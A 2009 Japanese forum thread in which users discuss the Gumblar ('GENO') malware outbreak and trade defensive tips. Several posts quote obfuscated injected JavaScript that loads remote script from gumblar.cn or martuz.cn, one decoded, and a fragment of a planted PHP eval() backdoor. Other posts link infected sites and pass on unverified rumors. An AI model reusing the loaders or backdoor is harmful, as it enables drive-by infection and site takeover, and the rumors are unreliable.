あちらこちらにわざとやってんのいるから

>>444
今回のウイルスですか？

>>445
すまそ

これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね？
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz

ちなみに　441　は

ドリームメールの　【P貯め〜る】ってメールから
リンクされています。
アクセスすると２ポイント

なんです。

>>451
つシステムの復元

バスターでは他のウイルスでも駄目なの多いからな

相変わらずaguseは反応しない。

>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね

>>441
責任もって削除以来してこい

Adobe Reader→環境設定→インターネット→PDFをブラウザに表示

PDFをブラウザに表示のチェックも外したほうがいいんじゃない？

メールからは感染しないんだよな？

HTMLメールに仕込めばいくらでも逝けるんじゃね？

>>458
だいぶ前からはずすように言われてるよ

よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうｐしようかな

>>461
読み直したら･･･
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから（￣▽￣；）

テンプレに反映出来てないんだろうな

>>463
もしかしたら前スレかもしれないけど両方はずとくといいって

>>462
ソースに情報が書き込まれてるって>>456でかいたんだが？

ほんとだこのスレには>>436しかないね

>>441
うぁぁぁぁぁぁ

>>466
いや、ただ試しに踏んでみたいだけ。

>>441
踏んじまっただろ！！責任取れ！！

一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います

>>462
やめておいた方がいい
http://www.virustotal.com/jp/analisis/2addc1c0a43118e4aca91e5c32a80b45

>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい（多分、あまり騒ぎ立てて欲しくないっぽい）
感染を全て確認したわけではないし、全ては自己責任の範囲で　らしいが。
俺は今から登録する。


KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。

>>471
えらい！

ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。

最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな

>>475
たぶん、日本語入ってないとこに移すの忘れずに

あとは･･･sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います

もうだめだ！！！！！！！！
インターネット閉鎖してください！！！！！！！！！！

>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。

まだやってんのかよ・・・。

macを確認したいのですがどうやって調べればいいのでしょうか？

>>470
ｗｗｗ。ｌｉｖｍａｉｌ。ｃｏｍ
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ

インターネット閉鎖できませーん

>>479,484
笑わすなｗｗ

>>473
の＞デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの？

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも（その分重いけど）。
avast と BitDefender のデュアルエンジンだったはず。
https://www.junglejapan.com/products/sec/gdata/trial/
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。　

sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば？
Everythingとかいろいろあるでしょ

これってファイルにも感染しますか？
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染？

うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない？php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい？詳しい人いる？

>>489
それアウトだな。

書こうと思ったらもう載ってた
http://www3.atword.jp/gnome/
緊急のとこね
>>441はmartuzに飛ばされるから

あの〜、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか？
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか？
そもそもGENOウィルスって何ですか？もしそれが原因なら、対処方法はあるのですか？
素人で大変申し訳ありませんが、宜しくお願いします。

>>482
Vistaユーザーだからmacはわからないです＞＜

>>492
まずはこのスレを最初から読もうね

>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな？

質問スレって無いんだっけ
混在しちゃうと読みづらい

俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない

Adobe Reader をアンスコすれば解決すんの？
使わないしイラネーな

>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね

>>498
フラッシュプレイヤーも

ちょ、なんだよ。前スレ落ちたな〜なんて思って寝たら、もうこんなにスレ進んでんのかよ。

evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり　比較的最近の型かな

それカスペでも反応する？

>>499
んじゃ>>491の
martuzとかは？

>>491
Nice!

おもしれえなこのスレｗ

ちょっと何この速さ
いつの間に5いってんの・・・
バグ？だれか説明してくれ

PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ？

Avira AntiVirを導入してるから安心してみておける

>>441
これ踏むとどうなるの？

勿論感染

814 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 03:13:30
>>732　なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい

>>508
>>380

>>508
>>380

>>513
サンキュ、助かった

22秒撃ち負けたｗ

改竄が読めません!

Googleが実現させたシンプルで高機能なブラウザ
http://www.google.co.jp/intl/ja/landing/chrome/index.html

WindowsXPを利用の初心者はこのブラウザでOK！
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。

>>509
擦り抜けるつってんだろ

なんかもう順番に読んでくのメンドイ；；；
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――――っ。

avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ

何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね

同人スレのまとめの人も混乱してやがる＼(^o^)／

感染サイト
hxxp://expss.main.jp/expss2/2005/07/

>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い

http://www31.atwiki.jp/doujin_vinfo/

同人板のまとめが分かり易いよ

今更だけどProxomitronでフィルタ作れば良くね

>>520
すげえきもい
才能あるなおまえ

evalとunescape両方あるね
FFFTPからそのphpファイルをTeraPadで開こうとするとAVGが反応する
ローカルにダウンロードしてから開くと反応しない、設定の問題か。
「ウイルス JS/Downloader.Agentが特定されました」って出るね

BSODってなに？

>>521
対応早いのはユーザーの多さじゃないか？

>このウィルスはKasperskyかニフティオンラインスキャン、avast!、ウイルスバスタ2009でしか今現在、検索できないウィルスです

バスター2007、2008はだめなのか？

>>525
ttp://www31.atwiki.jp/doujin_vinfo/pages/19.html
とりあえずここを参照

なんでGENOウイルスなの?GENOは被害者じゃないの?

やられた。同人サイトなんて見てないしgumblarに飛ばされたこともない。
怪しいexe実行した覚えもないしどこから感染したのか…。

>>534
もはや、加害者だろ

>>524
うわ。徹底的にやられてるね。
(function(TitRT)
(function(j4A)
(function(x5E)

とか、計24個貼ってある。

md5+それ以外のハッシュも求めるならAXHashTransおぬぬめ
ttp://www.vector.co.jp/soft/win95/util/se375205.html

>>525
使用ブラウザをFirefoxに変更、アドオンにNoScriptを入れる

>>530
ブルースクリーンとは 【blue screen】 - 意味・解説 ： IT用語辞典
http://e-words.jp/w/E38396E383ABE383BCE382B9E382AFE383AAE383BCE383B3.html

ウイルスバスター2009対応してないんじゃないの

>>507
同人関係で大量の個人サイト感染発覚→パニック＆祭り

>>532
むしろウイルスバスタ2009平気ってほんとなのか

>>534
被害者っちゃあ被害者だけど
真っ先に発覚したにも関わらず放置した期間が長かったし

>>532
2009はついこの間更新されて検出出来るようになったみたいですね〜

2009に換えろということかも･･･？ｗ

>>518
Genoウイルスが変化したらChromeは直ぐに対応するのかな

>>534
爆発的に感染者を増やした上
対応がお粗末だったから皮肉を込めてそう呼ばれてる

バスターのGENOME.BK って
誤検出じゃないの？
それとは違うくて？

>>545
亜種まで検出してんの？

そして週末土日で対応遅れるだろうし
もうどこのサイトも信用できない((((；ﾟДﾟ))))

>>533
>>539
ありがと

てかウイルス仕掛けたり作ったりしてるの日本人なの？

534の人気に嫉妬

�dフル初の感染者確認！

なんぼ週アスと手を組んで安売りセールやってももうGENOのサイト見に行きたくねえ
一度もないけど

HashTab Shell Extension お薦め
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html

>>553
genoの社員じゃねーのｗ

>>545
いやこの間の更新には入ってない

やべぇ。神戸で豚感染、国内初だって。
もう、何もかも終わった。

hxxp://www.livmail.com/3others-page/janet/tokusen/index.htm
見てきた、しっかりscript埋め込まれてる罠
<script language=javascript><!--
(function(){var UkRR='%';var WdBp=('v&61r&2・・・・・・・・・

リアルでも感染確定＼(^o^)／

VISTAなら大丈夫って本当？
HPだけど、4月7日に踏んだときに謎のCPU使用率UP現象があったんだけど。
再起動したら起動できなくなるとかはなかったけど。

>>555
お気に入りから消した
対策してあるけどさすがにカード使う気にも
住所入れる気にもならないな・・・

それでも安売りメール送ってくる
解除したいけどサイト踏みたくないｗ

豚インフルきちゃったな

>>518
XPにそれインストールして>>524を開いたら、真っ赤になった！
まじ、やべーよ！！

さっきGENOにアクセスしたらつながらなかったんだけど大丈夫かな
こわいなぁ

>>549
亜種までかはわからないけど･･･

タイミングも悪いよなー
豚インフル来ちゃったし、これで余計にマスコミに取り上げられる機会が…orz

524踏んじゃったけど大丈夫…？

踏んじゃったけど大丈夫？って聞くなら最初から踏むなよ

>>539の対処でNoScript入れても許可してるサイトが感染してたら意味ないよな？
最近youtubeやニコ動ですら怖くなってるわ

神戸在住の俺＼(＾o＾)／ ｵﾜﾀ

>>569
だめ

>>568
マスゴミだってＰＣつかってるから自分が感染すれば注目してくれるかもよ

豚インフルの感染者って地元なんだよね･･･

877 名前： geno [sage] 投稿日： 2009/05/16(土) 11:50:08 ID:bcj3KvYq0
これかわからないけど東方の超大手サイトからavast!でウイルス反応出るんだが
東方自ジャンルじゃないからどのスレいけばいいのかよくわかんね…
とりあえずサイト管理人にメールするしか出来ないのかね
こういうときは



これは・・・

>>524
> 感染サイト
> hxxp://expss.main.jp/expss2/2005/07/
ここも
function(TitRT){var H5h='%';var B4mN=('.76ar.20a.3d.22

リアルでもネットでもウィルス流行ｗｗｗｗ
何事だよ

某サイトで見たんですがfirefoxの
Adblock Plusのフィルタリストに

*/94.247.[2-3].[0-255]/*
*/94.229.[64-65].[0-255]/*

を追加するのは効果あるんですか？

524は感染サイトを紹介しているまとめサイトだと思って踏んじゃったんだよー

>>562
VISTAでも多分ヤバイ

>>549
亜種は検出しないよ

>>569
狐かchromeで見たの？
あとテンプレの通りに確認してみ？
念のためにavastさんでチェックな
最後に神社でお百度参りするんだ

VISTAって、今のところままだ感染報告来てないよな？
これから亜種が出てくるだろうが


ま、俺のところ９８なんで関係ないんですがね

>>581
マジか。
まぁ、今はクリーンインスコして快適にはなったんだけどね。
色々なとこで「VISTAなら大丈夫」とか言ってるのはなんなんだろ

おい、VISTAもあぶないのかよ。ほんまかいな。どうなってんだよ

しかけてる奴もvista大丈夫大丈夫言われるとやりたくなっちゃうだろ

524はあぼーん推奨だろ

東方同人サイト超大手、感染報告来たね

これはニコオタ全滅フラグ

Vistaでも感染ｼﾏｽ

>>546
Google次第だろうな

>>519
工エｴェｪ（´д｀）ｪェｴエ工工
ああああああああああああああああああああああああああああああああああ

熱い展開になってきたな

>>585
過去ログによると
GENOのサイトがお詫び文だか弁明ページだかで
そういうデマを流したらしい。

>>487
Ｍｅの場合、そもそも存在しないんでは？

これは日本＼(^o^)／

違うわ思い違いだわ。
寝惚けてるので落ちるゴメン

>>533
そのリンク先、
疑わしきURLはクリックしなければ、大丈夫って受け取るヤツがいそう。
全て対策したうえで、かつ　疑わしきリンクをクリックしない　にしてほしいな。


あと、次スレのテンプレでは　そろそろ　>>2は止めたほうがイイと思う。
もう、対策されたReaderが出ているんだし。
やむを得ず　古いバージョン(9.1以前)を使う状況にいるヤツは　こんなスレに来ないはず。
全員アップデートしろ！　だが、また脆弱性みつかるかもしれないから、JavaScript切っておけ　でよかろうよ。

FirefoxにNoScript入れて、なおかつプラグインを全部切った方がいいよ。
NoScriptは初期設定がどうだったか忘れたけど、トップサイトは許可とかいう「ザル化設定」が沢山あるから。
Flashみられなくたって、PDFがブラウザで読めなくたって、いつ来るか分からない新型亜種に感染するよりいいだろ。

これはひどいなｗ

http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558

Win系なら全部やばいって事でいいだろ
用心に越した事はないぞ？

怪しいサイトはjavascriptを無効にして踏むこと

>>600
つまり、Ｌｉｎｕｘにしろと？

とりあえず、面白半分で危険なサイトのURL(に近い)を貼るのは止めにしません？

ウィルス貼ってるのと同じようなものだし、
今から知識を得て対策しようとしてる人がカワイソだよ

>>596
なあにが日本万歳だこの糞野郎

avastがうるせーと思ったけど、調べてみたらなるほど。やるじゃん
いつもJS切ってるから大丈夫だったけど、警告はされるのね

>>565
オイラもXPだから入れてやってみよう

>>592
少なくとも改竄されたhtml踏んでも反応はしないし、恐らくだがpdf読み込んだ後も反応しなかった。
その時のウイルス自体には対応しただろうけど、htmlの改竄が見抜けない以上、すり抜けは続くんじゃないかな。
まあ無料版の8 Personalってのもあると思うけど。

この板だとネタなのかマジレスなのか分からん奴多いんだよな

>>602
そのうちＭＡＣとか全部に感染する亜種がでるかもな

>>599
ワロタｗｗｗ
Genoウィルスが問題ないってｗ

Googleでも感染するってある意味最強じゃね？

ttp://www.virustotal.com/analisis/ed413980519f79ed84cc322b5cd48765
ttp://www.virscan.org/report/6e71de22a350a54d142f3b66606814f8.html

>>611
グーグルのサーバーにも感染してるの？
ってことは、ググったらアウト？

>>602
踏んでしまったのですが、○○ですが大丈夫でしょうか？(○○はOS)
って質問するよりログ読んだ方が速いだろと

ぐぐってリンク開かなければ大丈夫なんじゃなくて
検索使うだけでアウアウ？

>>524のサイトは難読化されたコードが24個も埋め込まれているｗ

俺のブラウザOPERAなんだけど…firefoxみたいに対策できないの？

凄いアホな質問していいか？
サイトでの感染があるのは分かったけど、感染したパソコンから送られた『メール』で
感染する可能性は？

Lunascapeのscript、Java無効設定じゃ危ない？

>>603
みんなネットサーフィンで知らずに踏んでると思われ

【新型インフル】 "ついに発生" 渡航歴ない高校生、新型インフルエンザと確定。どうやって感染？…他に１７人の体調不良者も
http://tsushima.2ch.net/test/read.cgi/newsplus/1242442362/

>>607
地道にNoScriptでがんばろうと思います。

最初に作った犯人を逮捕することはできないの？
その犯人に拡大の仕組みを自白させれば解決するんじゃないの？

>>617
F12キー押してJavaScriptとプラグインのチェックを外せばおｋ

このウイルスは広める能力はないから

>>620
普通に法律の解説サイトとかにウイルス紛れ込んでいるからな・・・
アダルトサイトとか違法ＤＬサイトなら分かるんだが・・・

>>624
それだと安心できるな
しかしインターネットがつまらないものになりそうだ

>>623
東欧とかロシアとか中国じゃないのか？本拠地は
そいつらをすぐに逮捕できると思うか？

524のサイト
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。このウェブサイトにアクセスすると
コンピュータに損害を与える可能性があります。

5397 個のドメインを感染させています。

増えてる　((；゜Д゜)ガクガクブルブル

国家が匿うな

XPなんだけど、sqlsodbc.chmのサイズが変。ハッシュもあわなかった。
cmd、regedit、再起動することはできる

ニフティのスキャンは、ロックのかかったファイルがいっぱい出てきた以外には、何もでなかった

sqlsodbc.chmのフォルダが圧縮されてる(青文字で表示されてる)のは何か関係ある？
それとも亜種なだけ？

NoScriptでGoogle開いてもJS禁止されてるね
Googleが危険なサイトだとみなされている翔子です

>>624
やってくる
ありがとう！

>>627
サイトごとの編集を使うってのあるが、結局許可したサイトが汚染されたら意味無し
まあ俺はyoutubeとかを許可しているけど

俺のPCにはsqlsodbc.chmが存在しないからかなり楽観視してるけど
そんなの関係ねえのかな？

>>635
>>4
＞※sqlsodbc.chmを使わない亜種の存在が確認されていますので、
＞この方法に完全に頼るのは危険かもしれません。

Noscriptなら許可したサイトを開いても94.247.2.195は許可されないから問題ないんじゃないの？

>>636
くそがああああああああああああ
俺を早く安心させてくれ

裁判員に選ばれたらウイルス製作者を死刑にしようと思う。

>>631
数回仮想環境で感染してみたけどcmdとregedit普通に動作出来たり
再度感染すると出来なかったりバラバラみたい

>>638
回線をハサミで切ったらおｋ

NO scriptなんて甘っちょろいことしないでjava全部無効でいいだろ
you tubeとか見れなくなるけどさ

>>631
SQL ServerやMSDE、Visual Studio等を入れるとバージョンによってサイズ変わるよ。
ファイルの更新日付が最近じゃなければ、sqlsodbc.chmそのものはそれほど
気にする必要がない。他の症状が何もないなら気にしなくていいと思う。

javascriptじゃない感染方法もあるんじゃないの？

FirefoxでNoScript入れて無くてもJavaScriptを有効にしてなければ平気？

おいお前らJavaScriptを略すならjsにしろ
Javaと区別つかねーだろうが

>>613
>>615
さっきやって分かった。FirefoxはデフォルトだとGoogleのリンク先先読み設定あるから、
about:config で network.prefetch-next を falseにしとけ。

捕まえたやつに数億賞金出せばおもしろいことになりそうだな

>>632
自分で許可しなければ、全て禁止ですｗｗｗ

>>640
共通項ってなかった？

はぁ、おっぱい見てぇ

>>647
これ、さっきのりぶメールって何のサイトなんだろうと思ってぐぐったら
検索結果が表示された瞬間Avast!が吼えまくったんで気づいたんだ。

>>632
いやお前のNoScriptの設定でgoogle.co.jpかgoogle.comを禁止してるだけだろ
Noscript入れたばかりでそうなってるかもしれないけど

FireFoxにNoScriptでウイルス回避しても
行きつけのサイトをスクリプト許可していたら危険URLに飛ばされるだろうし
上級者なら気づくが超初心者ならスクリプトの許可をしそうでやばいな

>>635
それにＧＥＮＯだけじゃなく普通の新種ウイルスにも注意するべきだろｗ

>>637
どういうこと？詳しく

631です

sqlサーバー入ってる
…けどファイルの最終更新日が、同人の方で感染報告してる人たちと同じみたいなのでやっぱ怪しいわ

>>647
日本語で頼む

>>654
VistaのUACも同じだろな
うっかり「OK」をｸﾘｯｸしそうだ

>>644
objectタグ使うとかありうるよな。
ftpアカウント取っちゃってるんだから、新たなおいしい脆弱性が発見されるまで
発症しないで潜んでるなんていうのもありうる。

>>647
ありがと！

>>527
作ってお願い。

>>647
>>652
なるほど
気を付ける

一番はやっぱりプラグインの無効化だろう

Adobe Flash Player を最新版にしたらおかしくなるんだけど…いろいろ見れなくなる
これってこのウイルスのせいなの？
もう一か月以上続いてるんですけど・・・；

>>647
してやったぞ
ありがたく思え

>>649,653
なんか俺が馬鹿みたいじゃん＾＾；

>>665
それは普通に更新したらおかしくなる不具合でてる
完全に削除してから入れると良い

緊張感でチンポしゃぶりたくなってきた

>>647
変更したありがとう

何かもうやること多くてやんなっちゃうな
感染してもおｋなＰＣ用意して見た方が楽かもしれん

FIREFOXで安心が買えるのか？
心配になってきた…

>>671
そこでLinuxですよ旦那！！

>>656
noscriptはjsを個別にjsのドメインで許可不許可できる
今までみたいなjs全許可不許可とは全くの別物

感染してるかもしれないサイトを、更新チェッカー（WWWC）でチェックしても大丈夫ってことだよね。

今のところ不気味なことは起きてないし。

>>647のやり方誰か教えてくれ

95.129.144.0/23　全焼きしておこう

>>647
ありがとう、勉強になった

>>671
上級者も根を上げそうですか

ttp://www3.atword.jp/gnome/

＊＊＊　緊急　＊＊＊

gumblar.cn 95.129.145.58 の代わり

martuz.cn
95.129.145.58

IP addr は変更されていませんが gumblar.cn のドメインベースのみでブロックしている方は注意してください。

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

>>560
このサイトは既に martuz.cn になっている。

(function(){var UkRR='%';var WdBp=('var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j " a "Major" b+a+"Minor" b a "Build" b "j;");
document.write("<script src=//martu" "z.cn/vid/?id="+j "><\/script>");}').replace(//g,UkRR);eval(unescape(WdBp))})();

ジェノサイドウイルスか

通販サイトでサイズ表を見ようとしたらエラーになるんだがやられたのかな

>モール／ストアでは現在問題が発生しています。
>あとでもう一度試してください。
>コマンド構造の失敗
>(CMN0950E)
>コマンドを完了できません。コマンド構文が正しくないか、システムが必要とするパラメーターが渡されていません。

わりと大手のところなんだがこんなんじゃ迂闊にネットできないな

>>665
http://www.adobe.com/jp/shockwave/download/alternates/
ここからアンインストーラを落として、アンインスコ→再インスコし直してごらん

>>676
「about:config」でググれ。

でも、ググる前に、about:configでnetwork.prefetch-nextを無効にしておけよ。

>>676
火狐のロケーションバーにabout:config 入れろ

>>676
Firefoxのアドレス欄にabout:configってコピペ、Enter、
ずらずらーーーーーってアルファべ順に出てくる項目の中から
network.prefetch-nextを探して洗濯、右クリでtrueをfalseに変更

>>684
クソﾜﾛﾀｗｗｗｗ

>>682
名前出そうよ
隠してる場合じゃないだろ

FirefoxのURLバーに｢about:config｣と入力する。※警告が出てきても大丈夫
上の検索で｢network.prefetch-next｣と入力して、出てきた値がtrueだったらダブルクリック→falseにする。
あとFasterfoxだっけか？あれの先読みも切った方がいいかな

>>682
ニッセンとかムトウとか？

>>686
network.prefetch-nextを探してとかクソだるいから、ずらずら出てるとこの上の
フィルタってとこにまんま「network.prefetch-next」入れろ。したらFirefoxが探して
くれるから。

>>685
ﾄﾝｸｽ

Genoウイルスが更に凶悪化したら
上級者のお前らでも対応できるのか！

まあ無理と思うがなー

>>676じゃないが怖くてググれなかったから助かったwwwありがとうww

>>682
そうだね、あまりにも大手なら一部伏字でも名前だした方がいいかも

アマゾンか

おいおい。感染拡大してんの？

>>647
ありがとう

しかしこれをしたらリンクに飛ぶのが面倒になるんだな…
感染するよりはましだが

>>628
この犯人はただのお騒がせ目的じゃなくて
集めたパスワードとかの情報で悪い金儲けを企んでいるわけでしょ？
そのラインから捕まえられないのかなあ？

konozama陥落か

>>697
この伸び方、おもろいだろ？

加速度的に汚染が進みそうな予感
てか進んでるのか

>>676
Firefoxの先読みをOFFにするとインターネットが遅くなるがガマンしろな！

>>693
俺、友達にスパーハカーがいるから何とかしてもらう

>>698
体感速度そんな変わらなかったけどなあ。

Vistaユーザー用に　C:\Windows\Help\mui以下のディレクトリにsqlsodbc.chmが存在する
ってあったんだが更新日が2006年でサイズが５０KB 前後なんだよね
これってセーフでいいのかな

しかし、なんで同人系は感染率高いんだ？
動画サイト経由で食らったんかな？

falseに変えたらそのままタブ閉じちゃえばいいの？
設定ページからの戻り方が分からない

アマゾン陥落？
嘘だよな？

>>708
閉じていい。

今朝、他の掲示板はどうかと思ってアホーの掲示板でウィルスで探してみた
見なければ良かった・・・oｒｚ

セキュリティーソフトも入れていないのが多数
それで言い訳は初心者ｗｗｗｗｗｗｗｗ
拡散するだろうなと思って恐ろしくなったよ

>>647設定したけど遅くなったりはしなかったんだぜ

>>704
友達のスパハカーのパソコンもGENOウイルスに感染している悪寒ｗ

ええええ、アマゾン？？利用しまくってるのに…
もう、怖くてネットサーフィンできないな

タスクマネージャー見たらASDUtility.exeが起動してた
なんだこれ

>>710
閉じた。ありがとう。

>>701
流れ早いしｗやっかいそうだな

>>707
サイト持ちが感染→気がつかずにサイト更新→サイト見た人が感染
のループ

>>707
多分、見てる奴が作る奴兼ねてる率が滅茶苦茶高いから。

アマゾン感染ならまじでニュースになるな

>>706
問題ない。その日付だとMSSQL2005相当のヘルプファイルでたぶんVistaのデフォ。

>>712
そうか光あたりを入れてた別だな

豚フルの奴どこで感染したんだよ

PC(XP Pro Sp3)内を検索してもsqlsodbc.chm見つからないんだけれど
ないとやばいの？

ｽﾚﾁなのでいい加減止めるが
このウィルス、感染者のサイトを改竄して
普通のサイトをどんどんウィルスサイトにする所が怖い
最近では小林製薬とかのサイトも感染したんだぜ
もう述べ何万件も感染してるだろう（復旧したところもあるけど）
あんまりにも一部でしか騒がれてないからついつい書いたもにぃ

>>674
基本全て禁止→個別に許可じゃないの？
個別に94.247.2.195を禁止ってどうやって設定するの？

>>713
そしたらその日からそいつのことをスパーバカーと呼ぶことにする

アマゾンは釣りだろｗ

人生初めての誤爆orz

>>703
逆に早くなるんじゃないの？

>>707
同人サイトを検索するサーチエンジンが感染してる

>>722
ADSLですが快適です

konozama!!!!!

>>578
その上、経済状況までクソ悪いんだからシャレになんねーよ今の世の中ｗｗｗどうなってんだよｗｗｗ

え、何、アマゾン陥没したんか？釣りだよな？

DNSプリフェッチはONでも関係ないよね？　あるのかな？

ウイルス作るようなやつはもう終身刑でいいよ。

今回のような悪質なウイルスを作る奴は死刑。

混乱したら困るから釣りはやめとけ

>>721
ありがと
しかしVistaは大丈夫とか大丈夫でないとかどっちなんだかわけわからなくなってきてるな

>>735
もう、どっちでもいいよorz

>>705
体感速度は変わらないんだけどリンクに飛ぶたび、プログラムを選択しなくちゃいけないのがちょっとね

これで、どれだけ被害を防げるのだろう…

釣りはよしとけ

>>736
関係ない。DNSポイズニングならたいていのアンチウィルスで検知できるし。

>>599
おい、avast反応したぞ・・・

>>711
初心者はセキュリティ祖父と入れなくていいと思い込んでいそうですね＾＾；

>>741
え？なんぞそれ
どういう状況？

豚エンザ　報道中www　がんがれますぞえ

>>441フンじまったから
avastで「完全な検査」したら引っ掛かりまくりだなｗ
俺のＰＣ終わったなｗ

Amazonは釣り？

しまった今までウイルスバスターやら火狐やら積んでなかった
今この状況で何積んどけばいいんだ

いっそのことwindows全滅してくれれば・・・・
Mac,Linux,BSDの時代キター！？

まぁ、Vista以降だとアドレスランダム化があるから確実に進入は難しくなるけど。

海外渡航歴なしって神戸終わったな

>>743
そうですか　ありがとう御座います

神戸って外国？

危険なアドを貼るときはまじで配慮しろよ
無知な奴がかなり踏んでるから

>>754
ワラタ

これどんな対策しても亜種が次々出て来てるんだよな・・・
根本的に解決できるまで専ブラで2chだけとかが安心だな

まあkonozama陥落してなくても
今はネットショッピングとかやめといたほうがいいだろ

>>726
そうだけど何が疑問なんだ？

>>744
Avast!って過剰反応だよな。

>>751
windows全滅してくれれば、
Mac,Linux,BSDにウイルス感染クルーだろ！

ネットでクレカ使うの怖いね今は

>>754
兵庫県は多国籍国家

